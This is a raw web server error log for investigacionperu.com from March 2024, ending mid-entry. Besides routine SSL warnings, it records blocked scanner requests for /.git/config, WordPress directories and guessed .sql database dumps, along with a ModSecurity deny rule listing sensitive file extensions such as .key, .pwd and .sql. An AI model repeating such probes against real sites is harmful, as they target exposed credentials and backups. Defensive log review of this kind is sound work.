28706#28706: *68378 access forbidden by rule, client: 209.38.248.17, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Mar 08 18:29:15.215084 2024] [:error] [pid 28845:tid 139963832157952] [client 159.65.235.173:41644] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/plugins.php, referer: investigacionperu.com [Sat Mar 09 03:41:18.731276 2024] [ssl:warn] [pid 3934:tid 139793541093248] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 09 03:41:27.104143 2024] [ssl:warn] [pid 3936:tid 139793541093248] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 09 03:41:27.523519 2024] [ssl:warn] [pid 3936:tid 139793541093248] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 09 03:41:29.773183 2024] [ssl:warn] [pid 3936:tid 139793541093248] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 09 03:41:32.053779 2024] [ssl:warn] [pid 4641:tid 140493450024832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 09 03:41:40.277363 2024] [ssl:warn] [pid 4643:tid 140493450024832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 09 09:52:29.131578 2024] [autoindex:error] [pid 4664:tid 140493128193792] [client 141.94.87.67:55722] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/paste/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/paste/index.php [Sun Mar 10 03:22:32.568349 2024] [ssl:warn] [pid 21537:tid 140621847426944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 10 03:22:36.789879 2024] [ssl:warn] [pid 21540:tid 140621847426944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 10 03:22:37.193313 2024] [ssl:warn] [pid 21540:tid 140621847426944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 10 03:22:39.361451 2024] [ssl:warn] [pid 21540:tid 140621847426944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 10 03:22:41.666064 2024] [ssl:warn] [pid 21958:tid 139920288642944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 10 03:22:45.869917 2024] [ssl:warn] [pid 21961:tid 139920288642944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 11 03:27:16.689515 2024] [ssl:warn] [pid 3797:tid 140633304029056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 11 03:27:24.919707 2024] [ssl:warn] [pid 3798:tid 140633304029056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 11 03:27:25.314262 2024] [ssl:warn] [pid 3798:tid 140633304029056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 11 03:27:27.423070 2024] [ssl:warn] [pid 3798:tid 140633304029056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 11 03:27:29.591841 2024] [ssl:warn] [pid 4433:tid 139935803381632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 11 03:27:37.790926 2024] [ssl:warn] [pid 4437:tid 139935803381632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 11 20:03:04.553941 2024] [autoindex:error] [pid 4456:tid 139935403144960] [client 4.242.246.58:39668] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Mar 12 03:49:17.223060 2024] [ssl:warn] [pid 21762:tid 140313390241664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 12 03:49:25.450200 2024] [ssl:warn] [pid 21768:tid 140313390241664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 12 03:49:25.875346 2024] [ssl:warn] [pid 21768:tid 140313390241664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 12 03:49:27.780756 2024] [ssl:warn] [pid 21768:tid 140313390241664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 12 03:49:30.018317 2024] [ssl:warn] [pid 22216:tid 139826662315904] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 12 03:49:38.214776 2024] [ssl:warn] [pid 22220:tid 139826662315904] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 12 03:49:39.772984 2024] [ssl:warn] [pid 22220:tid 139826662315904] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/03/13 03:37:17 [error] 22341#22341: *132578 connect() failed (111: Connection refused) while connecting to upstream, client: 54.88.179.33, server: investigacionperu.com, request: "GET / HTTP/1.1", upstream: "http://198.199.72.26:8181/", host: "investigacionperu.com." [Wed Mar 13 03:37:17.766036 2024] [ssl:warn] [pid 2690:tid 140290656257920] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 13 03:37:30.133159 2024] [ssl:warn] [pid 2698:tid 140290656257920] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 13 03:37:30.680483 2024] [ssl:warn] [pid 2698:tid 140290656257920] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 13 03:37:33.083585 2024] [ssl:warn] [pid 2698:tid 140290656257920] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 13 03:37:35.342861 2024] [ssl:warn] [pid 3143:tid 139804280039296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 13 03:37:43.599791 2024] [ssl:warn] [pid 3144:tid 139804280039296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/03/13 11:25:44 [error] 3125#3125: *138801 access forbidden by rule, client: 3.94.113.2, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Mar 14 03:17:26.174008 2024] [ssl:warn] [pid 20115:tid 139683851102080] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 14 03:17:38.381894 2024] [ssl:warn] [pid 20118:tid 139683851102080] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 14 03:17:38.753874 2024] [ssl:warn] [pid 20118:tid 139683851102080] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 14 03:17:40.918466 2024] [ssl:warn] [pid 20118:tid 139683851102080] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 14 03:17:43.168402 2024] [ssl:warn] [pid 20536:tid 140243268388736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 14 03:17:55.363424 2024] [ssl:warn] [pid 20542:tid 140243268388736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 14 11:38:03.039304 2024] [ssl:warn] [pid 8249:tid 140659636000640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 14 11:38:07.260251 2024] [ssl:warn] [pid 8261:tid 140659636000640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 14 11:38:07.614934 2024] [ssl:warn] [pid 8261:tid 140659636000640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 14 11:38:09.437754 2024] [ssl:warn] [pid 8261:tid 140659636000640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 14 11:38:11.715364 2024] [ssl:warn] [pid 8715:tid 139879274600320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 14 11:38:13.922365 2024] [ssl:warn] [pid 8721:tid 139879274600320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 14 16:46:39.643105 2024] [autoindex:error] [pid 8736:tid 139878922692352] [client 64.227.179.13:56494] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Mar 14 23:08:34.707015 2024] [autoindex:error] [pid 8737:tid 139879083460352] [client 20.38.1.181:34236] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Mar 15 03:09:26.386882 2024] [ssl:warn] [pid 14794:tid 140456788277120] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 15 03:09:30.595794 2024] [ssl:warn] [pid 14797:tid 140456788277120] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 15 03:09:30.960454 2024] [ssl:warn] [pid 14797:tid 140456788277120] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 15 03:09:32.949429 2024] [ssl:warn] [pid 14797:tid 140456788277120] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 15 03:09:35.265145 2024] [ssl:warn] [pid 15220:tid 140313267214208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 15 03:09:43.464867 2024] [ssl:warn] [pid 15222:tid 140313267214208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 15 15:31:06.345263 2024] [autoindex:error] [pid 15243:tid 140312882145024] [client 162.241.62.127:50922] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/wpgallery/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/wpgallery/index.php [Sat Mar 16 03:48:25.856987 2024] [ssl:warn] [pid 13018:tid 139748401207168] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 16 03:48:45.142733 2024] [ssl:warn] [pid 13028:tid 139748401207168] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 16 03:48:46.498216 2024] [ssl:warn] [pid 13028:tid 139748401207168] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 16 03:48:49.291860 2024] [ssl:warn] [pid 13028:tid 139748401207168] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 16 03:48:51.766144 2024] [ssl:warn] [pid 13514:tid 139680972126080] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 16 03:49:03.968665 2024] [ssl:warn] [pid 13523:tid 139680972126080] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 17 03:06:24.204792 2024] [ssl:warn] [pid 30835:tid 140134635173760] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 17 03:06:36.430863 2024] [ssl:warn] [pid 30844:tid 140134635173760] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 17 03:06:36.865984 2024] [ssl:warn] [pid 30844:tid 140134635173760] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 17 03:06:39.199939 2024] [ssl:warn] [pid 30844:tid 140134635173760] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 17 03:06:41.431657 2024] [ssl:warn] [pid 31290:tid 140393366738816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 17 03:06:49.631459 2024] [ssl:warn] [pid 31293:tid 140393366738816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 17 03:06:50.375031 2024] [ssl:warn] [pid 31293:tid 140393366738816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/03/17 11:46:45 [error] 31408#31408: *198260 access forbidden by rule, client: 185.220.101.31, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/03/17 11:46:46 [error] 31408#31408: *198262 access forbidden by rule, client: 192.42.116.176, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Sun Mar 17 19:03:31.680619 2024] [ssl:warn] [pid 31293:tid 140393366738816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 17 19:35:53.883893 2024] [:error] [pid 29913:tid 140392993343232] [client 188.166.92.179:48586] [client 188.166.92.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/inve.sql"] [unique_id "ZfeMaZUcmIkonP-N1UHH0AAAAM4"] [Sun Mar 17 19:35:54.697340 2024] [:error] [pid 29913:tid 140392942987008] [client 188.166.92.179:48588] [client 188.166.92.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/gacionperu.sql"] [unique_id "ZfeMapUcmIkonP-N1UHH0QAAANQ"] [Sun Mar 17 19:35:55.530571 2024] [:error] [pid 29780:tid 140393043699456] [client 188.166.92.179:48590] [client 188.166.92.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/peru.sql"] [unique_id "ZfeMa96iAjkT29li1LpxfAAAAAg"] [Sun Mar 17 19:35:56.303274 2024] [:error] [pid 29781:tid 140392984950528] [client 188.166.92.179:48592] [client 188.166.92.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/acionperu.sql"] [unique_id "ZfeMbDA0xdT7P27nr81T4gAAAE8"] [Sun Mar 17 19:35:57.016009 2024] [:error] [pid 29782:tid 140393043699456] [client 188.166.92.179:48594] [client 188.166.92.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigaci.sql"] [unique_id "ZfeMbcIahfcLJE-9sPB8dgAAAIg"] [Sun Mar 17 19:35:57.725403 2024] [:error] [pid 29781:tid 140392968165120] [client 188.166.92.179:48596] [client 188.166.92.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigacion.sql"] [unique_id "ZfeMbTA0xdT7P27nr81T4wAAAFE"] [Sun Mar 17 19:35:58.456709 2024] [:error] [pid 29781:tid 140392934594304] [client 188.166.92.179:48598] [client 188.166.92.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigacionpe.sql"] [unique_id "ZfeMbjA0xdT7P27nr81T5AAAAFU"] [Sun Mar 17 19:35:59.200868 2024] [:error] [pid 29781:tid 140393026914048] [client 23.129.64.222:48600] [client 23.129.64.222] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/inves.sql"] [unique_id "ZfeMbzA0xdT7P27nr81T5QAAAEo"] [Sun Mar 17 19:35:59.864621 2024] [:error] [pid 29781:tid 140393077270272] [client 23.129.64.222:48602] [client 23.129.64.222] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/tigacionperu.sql"] [unique_id "ZfeMbzA0xdT7P27nr81T5gAAAEQ"] [Sun Mar 17 19:36:01.878348 2024] [:error] [pid 29781:tid 140393060484864] [client 23.129.64.222:48604] [client 23.129.64.222] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investiga.sql"] [unique_id "ZfeMcTA0xdT7P27nr81T5wAAAEY"] [Sun Mar 17 19:36:02.737969 2024] [:error] [pid 29780:tid 140393085662976] [client 23.129.64.222:48606] [client 23.129.64.222] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wordpress.sql"] [unique_id "ZfeMct6iAjkT29li1LpxfQAAAAM"] [Sun Mar 17 19:36:03.466689 2024] [:error] [pid 29913:tid 140392951379712] [client 23.129.64.222:48608] [client 23.129.64.222] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri 